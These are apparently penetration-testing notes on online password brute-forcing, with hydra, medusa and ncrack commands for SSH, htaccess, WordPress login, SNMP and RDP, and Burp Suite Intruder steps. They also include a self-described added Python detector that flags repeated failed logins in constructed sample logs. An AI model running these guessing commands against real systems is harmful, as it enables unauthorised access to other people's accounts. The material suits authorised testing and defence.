Online password cracking
There are several tools specialized for online bruteforcing. Several services are common targets for it, for example: VNC, SSH, FTP, SNMP, POP3, HTTP.
Port 22 - SSH
hydra -l root -P wordlist.txt 192.168.0.101 ssh
hydra -L userlist.txt -P best1050.txt 192.168.1.103 -s 22 ssh -V
Port 80/443 - htaccess
You can password protect directories with Apache pretty easily. Just configure the .htaccess file (I explain this in the chapter on Common ports).
It can then be brute forced like this:
medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/test -T 10
Logins
Use Burp Suite
- Intercept a login attempt.
- Modify the user field with ^USER^ and the password field with ^PASS^
- Grab the post request path (/wp-login.php)
- Grab the modified login request (last field in request)
You should then be able to populate the command like below (the quoted string is left open for now):
hydra -l username -P wordlist.txt TARGETIPADDRESS http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In
Send a fake request to the site and grab any text indicator of an invalid login (the string "is incorrect" in the example below).
Append it to the end of the hydra syntax and close the double quote:
hydra -l username -P wordlist.txt TARGETIPADDRESS http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:is incorrect"
Use Burp Suite Pro. (This can be done in the free edition, but it is ridiculously slow.)
- Intercept a login attempt.
- Right-click and choose "Send to Intruder". Select Sniper if you only have one field you want to bruteforce, for example if you already know the username. Otherwise select the Cluster bomb attack type.
- Select your payload, your wordlist.
- Click attack.
- Look for response-length that differs from the rest.
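Every one of the tools above leaves a dense trail of failed logins in the target's logs, which is what a defender keys on. The following script is an added example, not part of these notes and not from the hydra, medusa or ncrack projects: a sliding-window detector that reads sshd failures from an auth.log and POSTs to /wp-login.php from an Apache combined-format access log, groups them by source IP, and raises one alert per source and service once the count crosses a threshold inside the window. It covers both the SSH section and the HTTP login section above. All log lines are constructed sample data; the threshold and window values, the "failed WordPress login returns HTTP 200, successful login redirects with 302" heuristic, and the log formats assumed by the regexes are assumptions for the example.

```python
"""Sliding-window detector for online password-guessing attempts.

Added example, not part of the original notes. Flags a source IP when it
produces THRESHOLD or more failed logins within WINDOW seconds, for two
log formats: sshd entries in /var/log/auth.log and Apache combined-format
access-log POSTs to /wp-login.php. All sample lines are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

THRESHOLD = 5   # failures per (source IP, service) before alerting (assumed value)
WINDOW = 60     # seconds (assumed value)

# sshd: "Mar  3 10:15:01 host sshd[1234]: Failed password for root from 1.2.3.4 port 51234 ssh2"
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)
# Apache combined: '1.2.3.4 - - [03/Mar/2024:10:15:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 ...'
APACHE_RE = re.compile(
    r'^(?P<ip>[\d.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] "POST /wp-login\.php[^"]*" (?P<status>\d{3})'
)


def parse_sshd(line, year=2024):
    """Return (timestamp, ip, service) for an sshd failed-password line, else None."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; normalise the double space before single-digit days
    ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
    return ts, m["ip"], "ssh"


def parse_apache(line):
    """Return (timestamp, ip, service) for a failed wp-login POST, else None."""
    m = APACHE_RE.match(line)
    # Assumption: a failed WordPress login re-renders the form with 200; success is a 302 redirect.
    if not m or m["status"] != "200":
        return None
    ts = datetime.strptime(m["ts"].split(" ")[0], "%d/%b/%Y:%H:%M:%S")  # drop the tz offset
    return ts, m["ip"], "http-login"


def detect(events, threshold=THRESHOLD, window=WINDOW):
    """events: iterable of (timestamp, ip, service). Returns a list of alerts
    (ip, service, count, first_ts, last_ts), one per (ip, service) the first
    time its failure count within the window reaches the threshold."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, ip, svc in sorted(events):
        key = (ip, svc)
        q = recent[key]
        q.append(ts)
        while q and (ts - q[0]).total_seconds() > window:   # expire old failures
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((ip, svc, len(q), q[0], ts))
    return alerts


def events_from(text, parser):
    return [e for e in map(parser, text.splitlines()) if e]


# Constructed sample data: one guessing source (192.168.0.50) and one legitimate user (192.168.0.77).
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 web1 sshd[2201]: Failed password for root from 192.168.0.50 port 51234 ssh2
Mar  3 10:15:03 web1 sshd[2203]: Failed password for root from 192.168.0.50 port 51236 ssh2
Mar  3 10:15:05 web1 sshd[2205]: Failed password for invalid user admin from 192.168.0.50 port 51238 ssh2
Mar  3 10:15:07 web1 sshd[2207]: Failed password for root from 192.168.0.50 port 51240 ssh2
Mar  3 10:15:09 web1 sshd[2209]: Failed password for root from 192.168.0.50 port 51242 ssh2
Mar  3 10:15:11 web1 sshd[2211]: Failed password for root from 192.168.0.50 port 51244 ssh2
Mar  3 10:20:00 web1 sshd[2300]: Failed password for alice from 192.168.0.77 port 40000 ssh2
Mar  3 10:20:04 web1 sshd[2302]: Accepted password for alice from 192.168.0.77 port 40000 ssh2
"""

SAMPLE_ACCESS_LOG = """\
192.168.0.50 - - [03/Mar/2024:10:16:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
192.168.0.50 - - [03/Mar/2024:10:16:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
192.168.0.50 - - [03/Mar/2024:10:16:04 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
192.168.0.50 - - [03/Mar/2024:10:16:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
192.168.0.50 - - [03/Mar/2024:10:16:08 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
192.168.0.77 - - [03/Mar/2024:10:21:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.0.77 - - [03/Mar/2024:10:21:01 +0000] "GET /wp-admin/ HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
"""


def run_sample():
    events = events_from(SAMPLE_AUTH_LOG, parse_sshd) + events_from(SAMPLE_ACCESS_LOG, parse_apache)
    return detect(events)


if __name__ == "__main__":
    for ip, svc, n, first, last in run_sample():
        print(f"ALERT {ip} {svc}: {n} failures between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

On the sample data this raises two alerts, both for 192.168.0.50 (ssh and http-login), and stays quiet for 192.168.0.77, whose single mistyped password followed by a successful login is normal user behaviour. The window is keyed per source and service so a slow, distributed guessing run spread over many sources stays below the threshold; that is the main blind spot of this kind of counter and the reason it is usually paired with per-account failure counts as well.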
Port 161 - SNMP
hydra -P wordlist.txt -v 192.168.0.101 snmp
Port 3389 - Remote Desktop Protocol
For RDP we can use Ncrack.
ncrack -vv --user admin -P password-file.txt rdp://192.168.0.101